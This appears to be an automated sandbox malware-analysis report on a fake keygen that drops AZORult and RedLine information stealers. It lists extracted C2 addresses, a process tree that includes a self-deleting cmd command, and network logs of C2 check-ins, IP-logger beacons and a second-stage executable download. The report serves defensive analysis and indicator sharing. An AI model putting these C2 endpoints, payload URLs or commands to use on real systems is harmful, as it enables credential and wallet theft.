Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

Dot.Tk.123...in.exe

windows11_x64

10

Dot.Tk.123...in.exe

windows10_x64

1

Dot.Tk.123...in.exe

windows10_x64

10

Resubmissions

13/01/2022, 13:19 UTC

220113-qkhx6sade2 4

12/09/2021, 07:40 UTC

210912-jhysaacbd3 10

12/09/2021, 07:40 UTC

210912-jhp55sfbbr 10

12/09/2021, 07:39 UTC

210912-jhc6kscbd2 10

12/09/2021, 07:39 UTC

210912-jg161sfbbp 10

12/09/2021, 07:38 UTC

210912-jgmnmafbbn 10

Analysis

  • max time kernel
    1756s
  • max time network
    1772s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    12/09/2021, 07:38 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Dot.Tk.123.ticket.keygen.by.CORE.bin.exe

  • Size

    6.2MB

  • MD5

    0cb3efeb5d9312e068c57e7e55affed7

  • SHA1

    aad1c65d257c7d2929ffb916114bc532feba0a16

  • SHA256

    a974231d8889e05fedfbe73b5cc58e414de6fd5031765c998a24ac326f35b0b2

  • SHA512

    236ce9aa9e71f279e7833c4f0afbad15a2de4aaf62e78a82f1132224951f25f0a184aacfe5c963a20481c20cdb12e1a56e6aaf662f4a07c756abe0c539488898

Score
10/10
azorultredlinenewmixnewdiscoveryinfostealerspywarestealersuricatatrojan

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

redline

Botnet

newmixnew

C2

94.140.115.194:31858

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M16

    suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M16

    suricata
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dot.Tk.123.ticket.keygen.by.CORE.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Dot.Tk.123.ticket.keygen.by.CORE.bin.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3264
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:420
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2364
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:3740
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:516
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe
          keygen-step-6.exe
          3⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:2864
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe" >> NUL
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1
              5⤵
              • Runs ping.exe
              PID:1344
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:596
          • C:\Windows\winnetdriv.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe" 1631432345 0
            4⤵
            • Executes dropped EXE
            PID:2532
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2716
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3644
            • C:\Users\Admin\Documents\PlsWnEU2.exe
              "C:\Users\Admin\Documents\PlsWnEU2.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:852

    Network

    • flag-us
      DNS
      kvaka.li
      keygen-step-1.exe
      Remote address:
      8.8.8.8:53
      Request
      kvaka.li
      IN A
      Response
      kvaka.li
      IN A
      185.173.37.179
    • flag-ru
      POST
      http://kvaka.li/1210776429.php
      keygen-step-1.exe
      Remote address:
      185.173.37.179:80
      Request
      POST /1210776429.php HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Host: kvaka.li
      Content-Length: 85
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.14.1
      Date: Sun, 12 Sep 2021 07:39:07 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      X-Powered-By: PHP/7.4.16
      X-Page-Speed: 1.14.36.1-0
      Cache-Control: max-age=0, no-cache
    • flag-us
      DNS
      iplogger.org
      keygen-step-6.exe
      Remote address:
      8.8.8.8:53
      Request
      iplogger.org
      IN A
      Response
      iplogger.org
      IN A
      88.99.66.31
    • flag-de
      GET
      https://iplogger.org/1SWBy7
      keygen-step-6.exe
      Remote address:
      88.99.66.31:443
      Request
      GET /1SWBy7 HTTP/1.1
      Host: iplogger.org
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 12 Sep 2021 07:39:08 GMT
      Content-Type: image/png
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=njjb7gq7mogndstcpsnvcmvut3; path=/; HttpOnly
      Pragma: no-cache
      Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=247615843; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Cache-Control: no-cache
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Answers: 1
      whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
    • flag-us
      DNS
      ip-api.com
      keygen-step-6.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json
      keygen-step-6.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Sun, 12 Sep 2021 07:39:07 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 323
      Access-Control-Allow-Origin: *
      X-Ttl: 51
      X-Rl: 43
    • flag-us
      DNS
      evaexpand.com
      keygen-step-6.exe
      Remote address:
      8.8.8.8:53
      Request
      evaexpand.com
      IN A
      Response
      evaexpand.com
      IN A
      185.92.244.225
    • flag-us
      DNS
      detacher.xyz
      KiffAppE2.exe
      Remote address:
      8.8.8.8:53
      Request
      detacher.xyz
      IN A
      Response
      detacher.xyz
      IN A
      195.123.221.77
    • flag-us
      DNS
      detacher.xyz
      KiffAppE2.exe
      Remote address:
      8.8.8.8:53
      Request
      detacher.xyz
      IN A
      Response
      detacher.xyz
      IN A
      195.123.221.77
    • flag-nl
      POST
      https://detacher.xyz/addnew.php
      KiffAppE2.exe
      Remote address:
      195.123.221.77:443
      Request
      POST /addnew.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: detacher.xyz
      Content-Length: 80
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 12 Sep 2021 07:39:11 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Strict-Transport-Security: max-age=15768000;
    • flag-us
      DNS
      kiff.store
      KiffAppE2.exe
      Remote address:
      8.8.8.8:53
      Request
      kiff.store
      IN A
      Response
      kiff.store
      IN A
      195.123.221.77
    • flag-nl
      GET
      https://kiff.store/links/uploads/PlsWnEU2.exe
      KiffAppE2.exe
      Remote address:
      195.123.221.77:443
      Request
      GET /links/uploads/PlsWnEU2.exe HTTP/1.1
      Host: kiff.store
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 12 Sep 2021 07:39:11 GMT
      Content-Type: application/octet-stream
      Content-Length: 355840
      Last-Modified: Sat, 11 Sep 2021 17:13:24 GMT
      Connection: keep-alive
      ETag: "613ce3b4-56e00"
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Strict-Transport-Security: max-age=15768000;
      Accept-Ranges: bytes
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • flag-us
      DNS
      api.ip.sb
      PlsWnEU2.exe
      Remote address:
      8.8.8.8:53
      Request
      api.ip.sb
      IN A
      Response
      api.ip.sb
      IN CNAME
      api.ip.sb.cdn.cloudflare.net
      api.ip.sb.cdn.cloudflare.net
      IN A
      104.26.12.31
      api.ip.sb.cdn.cloudflare.net
      IN A
      104.26.13.31
      api.ip.sb.cdn.cloudflare.net
      IN A
      172.67.75.172
    • flag-us
      GET
      https://api.ip.sb/geoip
      PlsWnEU2.exe
      Remote address:
      104.26.12.31:443
      Request
      GET /geoip HTTP/1.1
      Host: api.ip.sb
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Sun, 12 Sep 2021 07:39:21 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 285
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Access-Control-Allow-Origin: *
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7SETo%2F0lSWHa0itRbasSaIfI%2B%2BhJPcVyM7W3O6V3QCRTEfLf3owjutdTze25gyh7%2B%2FRlJZOZ87820Kz5rD2BqD5GfoqmThwp826jncL2BHlpmZBnmCAf%2BUsZ5A%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Server: cloudflare
      CF-RAY: 68d77b457d53c867-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      DNS
      evaexpand.com
      keygen-step-6.exe
      Remote address:
      8.8.8.8:53
      Request
      evaexpand.com
      IN A
      Response
      evaexpand.com
      IN A
      185.92.244.225
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • flag-de
      GET
      https://iplogger.org/1SrNy7
      keygen-step-6.exe
      Remote address:
      88.99.66.31:443
      Request
      GET /1SrNy7 HTTP/1.1
      Host: iplogger.org
      Cookie: PHPSESSID=njjb7gq7mogndstcpsnvcmvut3; clhf03028ja=154.61.71.51
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 12 Sep 2021 07:51:24 GMT
      Content-Type: image/png
      Transfer-Encoding: chunked
      Connection: keep-alive
      Pragma: no-cache
      Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=247615107; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Cache-Control: no-cache
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Answers: 1
      whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • 185.173.37.179:80
      http://kvaka.li/1210776429.php
      http
      keygen-step-1.exe
      520 B
       526 B
       6
      5

      HTTP Request

      POST http://kvaka.li/1210776429.php

      HTTP Response

      200
    • 88.99.66.31:443
      https://iplogger.org/1SWBy7
      tls, http
      keygen-step-6.exe
      1.1kB
       6.3kB
       15
      11

      HTTP Request

      GET https://iplogger.org/1SWBy7

      HTTP Response

      200
    • 208.95.112.1:80
      http://ip-api.com/json
      http
      keygen-step-6.exe
      294 B
       672 B
       5
      4

      HTTP Request

      GET http://ip-api.com/json

      HTTP Response

      200
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 195.123.221.77:443
      https://detacher.xyz/addnew.php
      tls, http
      KiffAppE2.exe
      1.1kB
       6.0kB
       11
      11

      HTTP Request

      POST https://detacher.xyz/addnew.php

      HTTP Response

      200
    • 195.123.221.77:443
      https://kiff.store/links/uploads/PlsWnEU2.exe
      tls, http
      KiffAppE2.exe
      7.1kB
       379.2kB
       145
      262

      HTTP Request

      GET https://kiff.store/links/uploads/PlsWnEU2.exe

      HTTP Response

      200
    • 94.140.115.194:31858
      PlsWnEU2.exe
      1.1MB
       22.8kB
       745
      374
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      411 B
       80 B
       4
      2

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 128.116.117.3:443
      tls
      46 B
       66 B
       1
      1
    • 104.26.12.31:443
      https://api.ip.sb/geoip
      tls, http
      PlsWnEU2.exe
      753 B
       4.3kB
       9
      8

      HTTP Request

      GET https://api.ip.sb/geoip

      HTTP Response

      200
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 128.116.117.3:443
      tls
      46 B
       75 B
       1
      1
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      678 B
       120 B
       5
      3

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      678 B
       120 B
       5
      3

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      411 B
       80 B
       4
      2

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 88.99.66.31:443
      https://iplogger.org/1SrNy7
      tls, http
      keygen-step-6.exe
      849 B
       1.3kB
       10
      7

      HTTP Request

      GET https://iplogger.org/1SrNy7

      HTTP Response

      200
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      411 B
       80 B
       4
      2

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
       3
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      678 B
       120 B
       5
      3

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      411 B
       80 B
       4
      2

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 205.234.175.102:443
      tls
      138 B
       197 B
       3
      3
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      411 B
       80 B
       4
      2

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 205.234.175.102:443
      tls
      138 B
       197 B
       3
      3
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 205.234.175.102:443
      tls
      92 B
       111 B
       2
      2
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      411 B
       80 B
       4
      2

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      678 B
       120 B
       5
      3

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 8.8.8.8:53
      kvaka.li
      dns
      keygen-step-1.exe
      54 B
       70 B
       1
      1

      DNS Request

      kvaka.li

      DNS Response

      185.173.37.179

    • 8.8.8.8:53
      iplogger.org
      dns
      keygen-step-6.exe
      58 B
       74 B
       1
      1

      DNS Request

      iplogger.org

      DNS Response

      88.99.66.31

    • 8.8.8.8:53
      ip-api.com
      dns
      keygen-step-6.exe
      56 B
       72 B
       1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
